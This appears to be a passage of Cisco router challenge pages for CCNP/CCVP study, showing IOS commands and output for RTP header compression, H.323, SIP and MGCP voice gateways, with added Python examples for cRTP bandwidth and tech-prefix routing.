Enable sending ICMP Mask Reply messages
mobile
Mobile IP support
mrm
Configure IP Multicast Routing Monitor tester
mroute-cache
Enable switching cache for incoming multicast packets
mtu
Set IP Maximum Transmission Unit
multicast
IP multicast interface commands
nat
NAT interface commands
nbar
Network-Based Application Recognition
next-hop-self
Configures IP-EIGRP next-hop-self
nhrp
NHRP interface subcommands
ospf
OSPF interface commands
pgm
PGM Reliable Transport Protocol
pim
PIM interface commands
policy
Enable policy routing
proxy-arp
Enable proxy ARP
rarp-server
Enable RARP server for static arp entries
redirects
Enable sending ICMP Redirect messages
rgmp
Enable/disable RGMP
rip
Router Information Protocol
route-cache
Enable fast-switching cache for outgoing packets
router
IP router interface commands
rsvp
RSVP Interface Commands
rtp
RTP parameters
sap
Session Announcement Protocol interface commands
security
DDN IP Security Option
split-horizon
Perform split horizon
summary-address
Perform address summarization
tcp
TCP header compression and other parameters
unnumbered
Enable IP processing without an explicit address
unreachables
Enable sending ICMP Unreachable messages
urd
Configure URL Rendezvousing
verify
Enable per packet validation
vrf
VPN Routing/Forwarding parameters on the interface
wccp
WCCP interface commands
(config-if)# ip rtp ?
compression-connections Maximum number of compressed connections
header-compression
Enable RTP header compression
priority
Assign a priority queue for RTP streams
reserve
Assign a reserved queue for RTP streams
(config-if)# ip rtp header-compression
(config-if)# encapsulation ppp
(config-if)# ip rtp compression-connections ?
<3-1000> Number of connections
(config-if)# ip rtp compression-connections 20
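Added example (Python; not from NetworkSims or Cisco) showing what RTP header compression actually saves on a link like the one configured above: per-call bandwidth is (voice payload + IP/UDP/RTP header + Layer 2 overhead) x 8 x packets per second, and cRTP replaces the 40-byte IP/UDP/RTP header with a 2-byte compressed header. The codec payload sizes, the 2-byte cRTP header and the Layer 2 overhead figures for PPP, Frame Relay and Ethernet are the usual planning values and are taken as assumptions here; the Frame Relay entry lets the same function cover the frame-relay variant of this configuration.

```python
from dataclasses import dataclass

IP_UDP_RTP_HEADER = 40   # bytes: IPv4 (20) + UDP (8) + RTP (12)
CRTP_HEADER = 2          # bytes: compressed header without UDP checksum (assumed planning value)

# Layer 2 overhead in bytes per packet (assumed planning values)
L2_OVERHEAD = {"ppp": 6, "frame-relay": 4, "ethernet": 18}


@dataclass(frozen=True)
class Codec:
    name: str
    payload_bytes: int        # voice payload per packet
    packets_per_second: int   # 20 ms packetization -> 50 pps


G729 = Codec("G.729", payload_bytes=20, packets_per_second=50)    # 8 kbps codec
G711 = Codec("G.711", payload_bytes=160, packets_per_second=50)   # 64 kbps codec


def frame_bytes(codec: Codec, l2: str = "ppp", crtp: bool = False) -> int:
    """Bytes on the wire for one voice packet, with or without cRTP."""
    header = CRTP_HEADER if crtp else IP_UDP_RTP_HEADER
    return codec.payload_bytes + header + L2_OVERHEAD[l2]


def call_bandwidth_bps(codec: Codec, l2: str = "ppp", crtp: bool = False) -> int:
    """Bandwidth of one call in bits per second."""
    return frame_bytes(codec, l2, crtp) * 8 * codec.packets_per_second


def calls_per_link(link_bps: int, codec: Codec, l2: str = "ppp", crtp: bool = False) -> int:
    """Whole calls that fit on a link of the given speed."""
    return link_bps // call_bandwidth_bps(codec, l2, crtp)


def saving_percent(codec: Codec, l2: str = "ppp") -> float:
    """Percentage of per-call bandwidth saved by enabling cRTP."""
    without = call_bandwidth_bps(codec, l2, crtp=False)
    with_crtp = call_bandwidth_bps(codec, l2, crtp=True)
    return round(100.0 * (without - with_crtp) / without, 1)


if __name__ == "__main__":
    for codec in (G729, G711):
        for l2 in ("ppp", "frame-relay"):
            plain = call_bandwidth_bps(codec, l2) / 1000
            comp = call_bandwidth_bps(codec, l2, crtp=True) / 1000
            print(f"{codec.name:6} {l2:12} {plain:5.1f} kbps -> {comp:5.1f} kbps "
                  f"({saving_percent(codec, l2)}% saved)")
    print("G.729 calls on a 128 kbps PPP link:",
          calls_per_link(128000, G729), "without cRTP,",
          calls_per_link(128000, G729, crtp=True), "with cRTP")
```

On a 128 kbps PPP link the calculation gives 4 simultaneous G.729 calls without compression and 11 with it, and that second figure is the number of compression contexts the ip rtp compression-connections setting has to allow; the saving is large for G.729 (the header dominates the 20-byte payload) and much smaller for G.711.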

Cisco Router Challenge 163


Outline

This challenge involves compressing the RTP header on a Frame Relay connection.
> CCNP ONT Area: Unit 5: Congestion Avoidance, Policing, Shaping and Link Efficiency
Mechanisms
Objectives
The objectives of this challenge are to:

Define RTP header compression for a frame-relay connection.

Example
> en
# config t
(config)# int s0
(config-if)# encapsulate ?
atm-dxi
ATM-DXI encapsulation
frame-relay Frame Relay networks
hdlc
Serial HDLC synchronous
lapb
LAPB (X.25 Level 2)
ppp
Point-to-Point protocol
smds
Switched Megabit Data Service (SMDS)
x25
X.25
(config-if)# encapsulate frame-relay
(config-if)# clock ?
rate Configure serial interface clock speed
(config-if)# clock rate ?
Speed (bits per second)
1200
2400
4800
9600
14400
19200
28800
32000
38400
56000
57600
64000
72000
115200
125000
128000
148000
192000
250000
256000
384000
500000
512000
768000
800000
1000000


1300000
2000000
4000000
8000000
<300-4000000>
Choose clockrate from list above
(config-if)# clock rate 1200
(config-if)# frame-relay ?
accounting             Special accounting instruction
address-reg            ELMI address registration
broadcast-queue        Define a broadcast queue and transmit rate
class                  Define a map class on the interface
congestion-management  Enable Frame Relay congestion management
de-group               Associate a DE group with a DLCI
fragment               Enable end-to-end fragmentation for all PVCs
fragmentation          Adaptive fragmentation
ifmib-counter64        Support IF-MIB's total packet/byte counts of Counter64
                       on FR if/subif when main interface's ifSpeed < 20 Mbps
interface-dlci         Define a DLCI on an interface/subinterface
interface-queue        configure PVC interface queueing
intf-type              Configure a FR DTE/DCE/NNI interface
inverse-arp            Enable/disable FR inverse ARP
ip                     Frame Relay Internet Protocol config commands
lmi-n391dte            set full status polling counter
lmi-n392dce            LMI error threshold
lmi-n392dte            LMI error threshold
lmi-n393dce            set LMI monitored event count
lmi-n393dte            set LMI monitored event count
lmi-t392dce            set DCE polling verification timer
lmi-type               Use CISCO-ANSI-CCITT type LMI
local-dlci             Set source DLCI when LMI is not supported
map                    Map a protocol address to a DLCI address
multicast-dlci         Set DLCI of a multicast group
policing               Enable Frame Relay policing
priority-dlci-group    Define a priority group of DLCIs
qos-autosense          enable QOS autosense
route                  frame relay route for pvc switching
traffic-shaping        Enable Frame Relay Traffic Shaping
traps-maximum          set max traps FR generates at link up or when getting
                       LMI Full Status message
(config-if)# frame-relay map ?
bridge  Bridging
bstun   Block Serial Tunnel
dlsw    Data Link Switching (Direct encapsulation only)
ip      IP
ipv6    IPV6
llc2    llc2
pppoe   PPP over Ethernet
qllc    qllc protocol
rsrb    Remote Source-Route Bridging
stun    Serial Tunnel
(config-if)# frame-relay map ip ?
A.B.C.D Protocol specific address
(config-if)# frame-relay map ip 1.2.3.4 ?
<16-1007> DLCI
(config-if)# frame-relay map ip 1.2.3.4 111 ?
broadcast            Broadcasts should be forwarded to this address
cisco                Use CISCO Encapsulation
compress             Enable TCP/IP and RTP/IP header compression
ietf                 Use RFC1490/RFC2427 Encapsulation
nocompress           Do not compress TCP/IP headers
payload-compression  Use payload compression
rtp                  RTP header compression parameters
tcp                  TCP header compression parameters
<cr>
(config-if)# frame-relay map ip 1.2.3.4 111 broadcast ?
cisco                Use CISCO Encapsulation
compress             Enable TCP/IP and RTP/IP header compression
ietf                 Use RFC1490/RFC2427 Encapsulation
nocompress           Do not compress TCP/IP headers
payload-compression  Use payload compression
rtp                  RTP header compression parameters
tcp                  TCP header compression parameters
<cr>
(config-if)# frame-relay map ip 1.2.3.4 111 broadcast rtp ?
header-compression  Enable RTP/IP compression
(config-if)# frame-relay map ip 1.2.3.4 111 broadcast rtp header-compression ?
active       Always compress RTP headers
connections  Maximum number of compressed RTP connections
passive      Compress for destinations sending compressed RTP headers
<cr>
(config-if)# frame-relay map ip 1.2.3.4 111 b r header-compression

Cisco CCVP Test 5

VoIP Fundamentals
The most up-to-date version of this test is at:
http://networksims.com/v05.html

Cisco Router Challenge 223

Outline
This challenge involves the configuration of an H.323 gateway.
Objectives
The objectives of this challenge are to:

Define H.323.

Outline
> enable
# config t
(config)# int e0
(config-if)# ip address 1.2.3.4 255.255.0.0
(config-if)# h323-gateway voip interface
(config-if)# h323-gateway voip h323-id gw_1
(config-if)# h323-gateway voip id gk.testing.com ipaddr 1.2.3.5 1718
(config-if)# h323-gateway voip bind srcaddr 1.2.3.4
(config-if)# h323-gateway voip tech-prefix 1#
(config-if)# exit
(config)# dial-peer voice 2 voip
(config-dial-peer)# destination-pattern 1166..
(config-dial-peer)# session target ras
(config-dial-peer)# exit
(config)# dial-peer voice 3 pots
(config-dial-peer)# destination-pattern 911
(config-dial-peer)# port 1/0/0
(config-dial-peer)# no register e164
(config-dial-peer)# exit
(config)# gateway

Where gk.testing.com is the Gatekeeper name, 1.2.3.5 is the gatekeeper IP address to register with, and 1718 is its port.

Example
> enable
# config t
(config)# int e0
(config-if)# ip address 1.2.3.4 255.255.0.0
(config-if)# h323-gateway ?
voip  Configure H323 Gateway Voip Interface
(config-if)# h323-gateway voip ?
bind         Configure Bind IP Address
h323-id      Specify an H.323 ID for this interface
id           Gatekeeper identifier
interface    Configure H323 Gateway Voip Interface
tech-prefix  Specify a technology prefix
(config-if)# h323-gateway voip interface
(config-if)# h323-gateway voip h323-id ?
WORD Specify the h323 id
(config-if)# h323-gateway voip h323-id gw_1
(config-if)# h323-gateway voip id ?
WORD An ASCII string up to 128 bytes
(config-if)# h323-gateway voip id gk.testing.com ?
ipaddr     IP address of the gatekeeper this gateway wants to register with
multicast  Use multicast discovery to register the gateway with a gatekeeper
(config-if)# h323-gateway voip id gk.testing.com ipaddr ?
A.B.C.D An IP address
(config-if)# h323-gateway voip id gk.testing.com ipaddr 1.2.3.4 ?
<1-65535> Port number
<cr>
(config-if)# h323-gateway voip id gk.testing.com ipaddr 1.2.3.5 1718
(config-if)# h323- v b ?
srcaddr  IP address of this interface that will be used as source addr
(config-if)# h323-gateway voip bind srcaddr ?
A.B.C.D  An IP address
(config-if)# h323-gateway voip bind srcaddr 1.2.3.4
(config-if)# h323-gateway voip tech-prefix ?
WORD A technology prefix that the interface will register with the
gatekeeper
(config-if)# h323-gateway voip tech-prefix #1
(config)# dial-peer voice 2 voip
(config-dial-peer)# destination-pattern 1166..
(config-dial-peer)# session target ras
(config-dial-peer)# exit
(config)# dial-peer voice 3 pots
(config-dial-peer)# destination-pattern 911
(config-dial-peer)# port 1/0/0
(config-dial-peer)# no register e164
(config-dial-peer)# exit
(config)# gateway

The main commands:

h323-gateway voip interface. This enables the router interface for H.323 processing.
h323-gateway voip h323-id gw_1. This defines the H.323 ID for the router.
h323-gateway voip id gk.testing.com ipaddr 1.2.3.5 1718. This defines the ID of the gatekeeper, with its IP address and TCP port number.

And the optional ones are:

h323-gateway voip tech-prefix 1#. This registers a technology prefix, which tells the gatekeeper that this gateway can handle 1# destinations (see explanation below).
h323-gateway voip bind srcaddr 1.2.3.4. This defines the source address for H.323 packets (1.2.3.4).

With no register e164, the router does not register the dial-peer's destination pattern with the gatekeeper, so the gatekeeper must use an alternative method to resolve it.
For a technology prefix, the administrator defines different classes of gateway, such as:

1# - voice gateway.
2# - voicemail gateway.
3# - H.320 gateway.
And so on.

The tech-prefix is then prepended to the number that is required, so that the call reaches the right gateway. For example, a caller might dial 1#1112222 to reach the telephone at 1112222 through a voice gateway. On receiving this, the voice gateway strips off the tech-prefix and sends the call to the telephone at 1112222.
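As an added illustration (not NetworkSims code), the Python below models the two steps just described: the gatekeeper picks a gateway class from the tech-prefix, then the gateway strips the prefix and matches what remains against its dial-peer destination-patterns. The prefix table, gateway names and dial-peer labels are constructed assumptions; the prefixes 1#/2#/3#, the number 1112222 and the patterns 1166.. and 911 come from this page.

```python
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

# Constructed gatekeeper registration table: each entry is what a gateway
# announced with "h323-gateway voip tech-prefix <prefix>". The prefixes are
# the page's own classes; the gateway names are made-up placeholders.
TECH_PREFIX_TABLE: Dict[str, str] = {
    "1#": "voice-gw",      # voice gateway
    "2#": "voicemail-gw",  # voicemail gateway
    "3#": "h320-gw",       # H.320 gateway
}

# Constructed dial-peer table for the voice gateway, modelled on the page's
# dial-peer 2 (destination-pattern 1166..) and dial-peer 3 (destination-pattern 911).
DIAL_PEERS: Dict[str, str] = {
    "1166..": "dial-peer 2 voip (session target ras)",
    "911": "dial-peer 3 pots (port 1/0/0)",
}


@dataclass(frozen=True)
class RouteDecision:
    gateway: Optional[str]  # gateway class chosen by the gatekeeper, None if none
    number: str             # digits handed to the gateway (prefix stripped on success)
    prefix: Optional[str]   # tech-prefix found in the dialed string, if any


def split_tech_prefix(dialed: str) -> Tuple[Optional[str], str]:
    """Split '1#1112222' into ('1#', '1112222'); a string with no '#' has no prefix."""
    head, sep, tail = dialed.partition("#")
    if not sep:
        return None, dialed
    return head + "#", tail


def route_call(dialed: str,
               table: Dict[str, str] = TECH_PREFIX_TABLE,
               default_gateway: Optional[str] = None) -> RouteDecision:
    """Gatekeeper side: choose the gateway class from the tech-prefix.

    Only a registered prefix is stripped. An unregistered prefix, or a
    non-numeric/empty remainder, is rejected (gateway=None) and the dialed
    string is returned untouched, so a mistyped prefix cannot leak into the
    called number.
    """
    prefix, number = split_tech_prefix(dialed)
    if prefix is None:
        return RouteDecision(default_gateway, number, None)
    gateway = table.get(prefix)
    if gateway is None or not number.isdigit():
        return RouteDecision(None, dialed, prefix)
    return RouteDecision(gateway, number, prefix)


def matches_destination_pattern(number: str, pattern: str) -> bool:
    """Fixed-length subset of IOS destination-pattern matching: '.' matches
    any one digit, every other character must match literally."""
    if len(number) != len(pattern):
        return False
    return all(p == "." or p == n for p, n in zip(pattern, number))


def select_dial_peer(number: str, dial_peers: Dict[str, str] = DIAL_PEERS) -> Optional[str]:
    """Gateway side, after the prefix is stripped: pick the dial-peer whose
    destination-pattern matches. The longest pattern is tried first, as IOS
    prefers the most specific match."""
    for pattern, peer in sorted(dial_peers.items(), key=lambda kv: -len(kv[0])):
        if matches_destination_pattern(number, pattern):
            return peer
    return None


if __name__ == "__main__":
    for dialed in ("1#1112222", "2#1112222", "1#116612", "1#911", "9#1112222", "1112222"):
        decision = route_call(dialed)
        peer = select_dial_peer(decision.number) if decision.gateway == "voice-gw" else None
        print(f"{dialed:<10} -> gateway={decision.gateway} number={decision.number} peer={peer}")
```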

Cisco Router Challenge 224


Outline
This challenge involves the configuration of SIP.
Objectives
The objectives of this challenge are to:

Enable SIP and its optional parameters.
Define a dial-peer for SIP Version 2.

Outline
> enable
# config t
(config)# sip-ua
(config-sip-ua)# retry invite 10
(config-sip-ua)# retry response 10
(config-sip-ua)# retry cancel 10
(config-sip-ua)# retry bye 10
(config-sip-ua)# sip-server dns:test
(config-sip-ua)# exit
(config)# dial-peer voice 66 voip
(config-dial-peer)# destination-pattern 111
(config-dial-peer)# session protocol sipv2
(config-dial-peer)# session target ipv4:1.2.3.4
(config-dial-peer)# exit
(config)# dial-peer voice 66 voip
(config-dial-peer)# destination-pattern 111
(config-dial-peer)# session protocol sipv2
(config-dial-peer)# session target sip-server
(config-dial-peer)# exit
(config)# exit
# sh sip-ua status
# sh sip-ua timers

Example
> enable
# config t
(config)# sip-ua
(config-sip-ua)# ?
SIP UA configuration commands:
aaa                  sip-ua AAA related configuration
authentication       Digest Authentication Configuration
calling-info         Specify treatment of calling information
default              Set a command to its defaults
disable-early-media  Disable early-media cut through
exit                 Exit from sip-ua configuration mode
max-forwards         Change number of max-forwards for SIP Methods
mwi-server           Configure a mwi Server
nat                  Enable NAT(Network Address Traversal) settings for the
                     SIP User Agent
no                   Negate a command or set its defaults
notify               SIP Signaling Notify Configuration
offer                Configure settings for Offers made from the Gateway
reason-header        Configure settings for supporting SIP Reason Header
redirection          Enable call redirection (3xx) handling
registrar            Configure SIP registrar VoIP Interface
remote-party-id      Enable Remote-Party-ID support in SIP User Agent
retry                Change default retries for each SIP Method
set                  Sets the PSTN cause to SIP status code (and vice versa)
                     and sets the PSTN cause to SIP requests
sip-server           Configure a SIP Server Interface
srv                  DNS SRV Query Type
suspend-resume       Enable support for ISDN SUSPEND/RESUME
timers               SIP Signaling Timers Configuration
transport            Enable SIP UA transport for TCP/UDP
(config-sip-ua)# retry ?
bye       BYE retry value
cancel    CANCEL retry value
comet     COMET retry value
info      INFO retry value
invite    INVITE retry value
notify    NOTIFY retry value
prack     PRACK retry value
refer     REFER retry value
register  REGISTER retry value
(config-sip-ua)# retry invite 10
(config-sip-ua)# retry response 10
(config-sip-ua)# retry cancel 10
(config-sip-ua)# retry bye 10
(config-sip-ua)# sip-server dns:test
(config-sip-ua)# exit
(config)# dial-peer voice 66 voip
(config-dial-peer)# destination-pattern 111
(config-dial-peer)# session ?
protocol   The session protocol to be used in getting to this peer
target     The session target for this peer
transport  The transport layer protocol used for this peer
(config-dial-peer)# session protocol ?
cisco      Cisco Session Protocol
multicast  Multicast Session Protocol(voice conferencing)
sipv2      IETF Session Inititation Protocol
(config-dial-peer)# session protocol sipv2
(config-dial-peer)# session target ?
WORD A string specifying the session target
(config-dial-peer)# session target ipv4:1.2.3.4
(config-dial-peer)# exit
(config)# dial-peer voice 66 voip
(config-dial-peer)# destination-pattern 111
(config-dial-peer)# session protocol sipv2
(config-dial-peer)# session target sip-server
(config-dial-peer)# exit
(config)# exit
# sh sip-ua timers
SIP UA Timer Values (millisecs unless noted)
trying 10000, expires 180000, connect 10000, disconnect 500
comet 500, prack 500, rel1xx 500, notify 500
refer 500, register 500, info 500, hold 2880 minutes, aging 5 minutes
# sh sip-ua status
SIP User Agent Status
SIP User Agent for UDP : ENABLED
SIP User Agent for TCP : ENABLED
SIP User Agent bind status(signaling): DISABLED
SIP User Agent bind status(media): DISABLED
SIP early-media for 180 responses with SDP: ENABLED
SIP max-forwards : 70
SIP DNS SRV version: 2 (rfc 2782)
NAT Settings for the SIP-UA
Role in SDP: NONE
Check media source packets: DISABLED
Maximum duration for a telephone-event in NOTIFYs: 2000 ms
SIP support for ISDN SUSPEND/RESUME: ENABLED
Redirection (3xx) message handling: ENABLED
Reason Header will override Response/Request Codes: DISABLED
SDP application configuration:
Version line (v=) required
Owner line (o=) required
Timespec line (t=) required
Media supported: audio image
Network types supported: IN
Address types supported: IP4
Transport types supported: RTP/AVP udptl

Cisco Router Challenge 225


Outline
This challenge involves the configuration of an MGCP Residential Gateway.
Objectives
The objectives of this challenge are to:

Enable Call Manager Application MGCP.
Define the MGCP call-agent.
Enable MGCP.

Outline
> enable
# config t
(config)# ccm-manager mgcp
(config)# mgcp
(config)# mgcp call-agent 192.168.0.1
(config)# voice-port 1/0/0
(config-voiceport)# exit
(config)# voice-port 1/0/1
(config-voiceport)# exit
(config)# dial-peer voice 1 pots
(config-dial-peer)# application mgcpapp
(config-dial-peer)# port 1/0/0
(config)# dial-peer voice 2 pots
(config-dial-peer)# application mgcpapp
(config-dial-peer)# port 1/0/1
(config-dial-peer)# exit
(config)# exit
# show mgcp statistics
# show call application voice summary
# show mgcp
# show call active voice brief
# show call history voice

Example
> enable
# config t
(config)# ccm ?
application               application specific
config                    MGCP download configuration
download-tones            Enable Tone Download from TFTP server
fallback-mgcp             Enable Fallback from MGCP to H.323 mode if no Call
                          Manager is available
fax                       Enable fax protocol for MGCP
mgcp                      Enable Call Manager Application MGCP mode
music-on-hold             Enable multicast Music-on-hold
redundant-host            Redundant host list
sccp                      Enable Call Manager Application SCCP mode
shut-backhaul-interfaces  Shutdown the backhauled interfaces if no Call
                          Manager is available
switchback                Configure switchback options for rehoming to
                          higher-order Call Manager
(config)# ccm-manager mgcp
(config)# mgcp ?
<1025-65535>         Enable MGCP with user specified UDP port number
behavior             Set MGCP message behavior
bind                 MGCP bind command
block-newcalls       Take down active connections in an orderly way
call-agent           Specify address of call-agent
codec                The codec rate to be attempted for MGCP controlled
                     connections
default-package      Select the Default Package Capability to be supported by
                     MGCP
dtmf-relay           configure mgcp dtmf-relay
endpoint             Configure endpoint handling
explicit             MGCP Level to disable/enable explicit detections
fax                  Configure MGCP Fax Parameters
ip                   Configure IP parameters for MGCP-controlled connections
max-waiting-delay    Specify Maximum Waiting Delay(MWD), prevents restart
                     avalanches
modem                Configure MGCP Modem Parameters
package-capability   Select the Package Capabilities to be supported by MGCP
persistent           Configure persistents events handling
piggyback            Configure piggyback message
playout              The jitter buffer packet size attempted for MGCP
                     controlled connections
profile              MGCP profile configuration mode
quality-threshold    Specify voice quality related threshold values
quarantine           Configuration for event quarantine buffer handling
request              Configuration for MGCP requests sent by this gateway
restart-delay        Specify the Restart Delay timer value
rtp                  configuration for MGCP rtp timer
rtrcac               Enable rtr-based VoIP CAC for MGCP
sched-time           Specify the Scheduler timer value
sdp                  Specify SDP operation for MGCP
sgcp                 Configuration for SGCP running in MGCP stack
src-cac              Enable system resource check CAC for MGCP
timer                configure MGCP timers
vad                  Enable VoiceActivityDetection(Silence Suppression) for
                     MGCP
validate             Validation of MGCP messaging
voice-quality-stats  Enable Voice Quality related stats reporting for MGCP
<cr>
(config)# mgcp
(config)# mgcp call-agent ?
WORD Hostname or IP address of the call-agent
(config)# mgcp call-agent 192.168.0.1
(config)# voice-port 1/0/0
(config-voiceport)# exit
(config)# voice-port 1/0/1
(config-voiceport)# exit
(config)# dial-peer voice 1 pots
(config-dial-peer)# ap ?
WORD  Application name (Use show call application voice summary for list)
(config-dial-peer)# application mgcpapp
(config-dial-peer)# port 1/0/0
(config)# dial-peer voice 2 pots
(config-dial-peer)# application mgcpapp
(config-dial-peer)# port 1/0/1

# show mgcp statistics


UDP pkts rx 0, tx 0
Unrecognized rx pkts 0, MGCP message parsing errors 0
Duplicate MGCP ack tx 0, Invalid versions count 0
CreateConn rx 0, successful 0, failed 0
DeleteConn rx 0, successful 0, failed 0
ModifyConn rx 0, successful 0, failed 0
DeleteConn tx 0, successful 0, failed 0
NotifyRequest rx 0, successful 0, failed 0
AuditConnection rx 0, successful 0, failed 0
AuditEndpoint rx 0, successful 0, failed 0
RestartInProgress tx 0, successful 0, failed 0
Notify tx 0, successful 0, failed 0
ACK tx 0, NACK tx 0
ACK rx 0, NACK rx 0
IP address based Call Agents statistics:
No Call Agent message.
System resource check is DISABLED. No available statistic
DS0 Resource Statistics
----------------------
Utilization: 0.00 percent
Total channels: 0
Addressable channels: 0
Inuse channels: 0
Disabled channels: 0
Free channels: 0
# show call application voice summary
SERVICES (standalone applications):
name               type         description
ipsla-responder    Tcl Script   builtin:app_test_rcvr_script.tcl
clid_authen        Tcl Script   builtin:app_clid_authen_script.tcl
clid_col_npw_npw   Tcl Script   builtin:app_clid_col_npw_npw_script.tcl
DEFAULT            C Script     builtin:Session_Service.C
CTAPP              C Script     builtin:CallTreatment_Service.C
fax_hop_on         Tcl Script   builtin:app_fax_hop_on_script.tcl
ipsla-testcall     Tcl Script   builtin:app_test_place_script.tcl
clid_authen_npw    Tcl Script   builtin:app_clid_authen_npw_script.tcl
session            Tcl Script   builtin:app_session_script.tcl
clid_col_npw_3     Tcl Script   builtin:app_clid_col_npw_3_script.tcl
lib_off_app        CCAPI        Libretto Offramp
stcapp             CCAPI        SCCP Call Control Application
MGCPAPP            CCAPI        MGCP Application

# show mgcp
MGCP Admin State DOWN, Oper State DOWN - Cause Code NONE
MGCP call-agent: none Initial protocol service is MGCP 0.1
MGCP block-newcalls DISABLED
MGCP validate domain name DISABLED
MGCP send SGCP RSIP: forced/restart/graceful/disconnected DISABLED
MGCP quarantine mode discard/step
MGCP quarantine of persistent events is ENABLED
MGCP dtmf-relay for VoIP disabled for all codec types
MGCP dtmf-relay for VoAAL2 disabled for all codec types
MGCP voip modem passthrough disabled
MGCP voaal2 modem passthrough disabled
MGCP voip modem relay: Disabled.
MGCP TSE payload: 100
MGCP T.38 Named Signalling Event (NSE) response timer: 200
MGCP Network (IP/AAL2) Continuity Test timer: 200
MGCP 'RTP stream loss' timer: 5
MGCP request timeout 500
MGCP maximum exponential request timeout 4000
MGCP gateway port: 2427, MGCP maximum waiting delay 3000
MGCP restart delay 0, MGCP vad DISABLED
MGCP rtrcac DISABLED
MGCP system resource check DISABLED
MGCP xpc-codec: DISABLED, MGCP persistent hookflash: DISABLED
MGCP persistent offhook: ENABLED, MGCP persistent onhook: DISABLED
MGCP piggyback msg ENABLED, MGCP endpoint offset DISABLED
MGCP simple-sdp DISABLED
MGCP undotted-notation DISABLED
MGCP codec type g711ulaw, MGCP packetization period 20
MGCP JB threshold lwm 30, MGCP JB threshold hwm 150
MGCP LAT threshold lwm 150, MGCP LAT threshold hwm 300
MGCP PL threshold lwm 1000, MGCP PL threshold hwm 10000
MGCP CL threshold lwm 1000, MGCP CL threshold hwm 10000
MGCP playout mode is adaptive 60, 40, 200 in msec
MGCP Fax Playout Buffer is 300 in msec
MGCP media (RTP) dscp: ef, MGCP signaling dscp: af31
MGCP default package: line-package
MGCP supported packages: gm-package dtmf-package trunk-package line-package
hs-package atm-package ms-package dt-package res-package
mt-package fxr-package
MGCP Digit Map matching order: shortest match
SGCP Digit Map matching order: always left-to-right
MGCP VoAAL2 ignore-lco-codec DISABLED
MGCP T.38 Fax is ENABLED
MGCP T.38 Fax ECM is ENABLED
MGCP T.38 Fax NSF Override is DISABLED
MGCP T.38 Fax Low Speed Redundancy: 0
MGCP T.38 Fax High Speed Redundancy: 0
MGCP control bind :DISABLED
MGCP media bind :DISABLED
MGCP Upspeed payload type for G711ulaw: 0, G711alaw: 8
MGCP Dynamic payload type for G.726-16K codec
MGCP Dynamic payload type for G.726-24K codec
MGCP Dynamic payload type for G.Clear codec
MGCP Guaranteed scheduler time is disabled

# show call active voice brief
<ID>:<start>hs.<index> +<connect> pid:<peer_id> <dir> <addr> <state>
dur hh:mm:ss tx:<packets>/<bytes> rx:<packets>/<bytes>
IP <ip>:<udp> rtt:<time>ms pl:<play>/<gap>ms lost:<lost>/<early>/<late>
delay:<last>/<min>/<max>ms <codec>
MODEMPASS <method> buf:<fills>/<drains> loss <overall%>
<multipkt>/<corrected>
last <buf event time>s dur:<Min>/<Max>s
FR <protocol> [int dlci cid] vad:<y/n> dtmf:<y/n> seq:<y/n>
sig:<on/off> <codec> (payload size)
ATM <protocol> [int vpi/vci cid] vad:<y/n> dtmf:<y/n> seq:<y/n>
sig:<on/off> <codec> (payload size)
Tele <int>:tx:<tot>/<v>/<fax>ms <codec> noise:<l> acom:<l> i/o:<l>/<l>
dBm
MODEMRELAY info:<rcvd>/<sent>/<resent> xid:<rcvd>/<sent>
total:<rcvd>/<sent>/<drops>
Proxy <ip>:<audio udp>,<video udp>,<tcp0>,<tcp1>,<tcp2>,<tcp3> endpt:
<type>/<manf>
bw:<req>/<act> codec:<audio>/<video>
tx:<audio pkts>/<audio bytes>,<video pkts>/<video bytes>,<t120
pkts>/<t120 bytes>
rx:<audio pkts>/<audio bytes>,<video pkts>/<video bytes>,<t120
pkts>/<t120 bytes>
Total call-legs:2
1269 :7587246hs.1 +260 pid:0 Answer active
dur 00:07:14 tx:590/11550 rx:21721/434420
IP 172.29.248.111:17394 rtt:3ms pl:431850/0ms lost:0/0/0 delay:69/69/70ms g729r8
1269 :7587246hs.2 +259 pid:133001 Originate 133001 active
dur 00:07:14 tx:21717/434340 rx:590/11550
Tele 1/0:1 (2):tx:434350/11640/0ms g729r8 noise:-44 acom:-19
i/0:-45/-45 dBm
# show call history voice
GENERIC:
SetupTime=104648 ms
Index=1
PeerAddress=55240
PeerSubAddress=
PeerId=2
PeerIfIndex=105
LogicalIfIndex=0
DisconnectCause=10
DisconnectText=normal call clearing.
ConnectTime=104964
DisconectTime=143329
CallDuration=00:06:23
CallOrigin=1
ChargedUnits=0
InfoType=speech
TransmitPackets=37668
TransmitBytes=6157536
ReceivePackets=37717
ReceiveBytes=6158452
VOIP:
ConnectionId[0x4B091A27 0x3EDD0003 0x0 0xFEFD4]
RemoteIPAddress=1.14.82.14
RemoteUDPPort=18202
RoundTripDelay=2 ms
SelectedQoS=best-effort
tx_DtmfRelay=inband-voice
FastConnect=TRUE
SessionProtocol=cisco
SessionTarget=ipv4:1.14.82.14
OnTimeRvPlayout=40
GapFillWithSilence=0 ms
GapFillWithPrediction=0 ms
GapFillWithInterpolation=0 ms
GapFillWithRedundancy=0 ms
HiWaterPlayoutDelay=67 ms
LoWaterPlayoutDelay=67 ms
ReceiveDelay=67 ms
LostPackets=0 ms
EarlyPackets=0 ms
LatePackets=0 ms
VAD = enabled
CoderTypeRate=g729r8
CodecBytes=20
cvVoIPCallHistoryIcpif=0
SignalingType=cas
Modem passthrough signaling method is nse
Buffer Fill Events = 0
Buffer Drain Events = 0
Percent Packet Loss = 0
Consecutive-packets-lost Events = 0
Corrected packet-loss Events = 0
Last Buffer Drain/Fill Event = 373sec
Time between Buffer Drain/Fills = Min 0sec Max 0sec
GENERIC:
SetupTime=104443 ms
Index=2
PeerAddress=50110
PeerSubAddress=
PeerId=100
PeerIfIndex=104
LogicalIfIndex=10
DisconnectCause=10
DisconnectText=normal call clearing.
ConnectTime=104964
DisconectTime=143330
CallDuration=00:06:23
CallOrigin=2
ChargedUnits=0
InfoType=speech
TransmitPackets=37717
TransmitBytes=5706436
ReceivePackets=37668
ReceiveBytes=6609552
TELE:
ConnectionId=[0x4B091A27 0x3EDD0003 0x0 0xFEFD4]
TxDuration=375300 ms
VoiceTxDuration=375300 ms
FaxTxDuration=0 ms
CoderTypeRate=g711ulaw
NoiseLevel=-75
ACOMLevel=11
SessionTarget=
ImgPages=0

Cisco Router Challenge 195

Outline
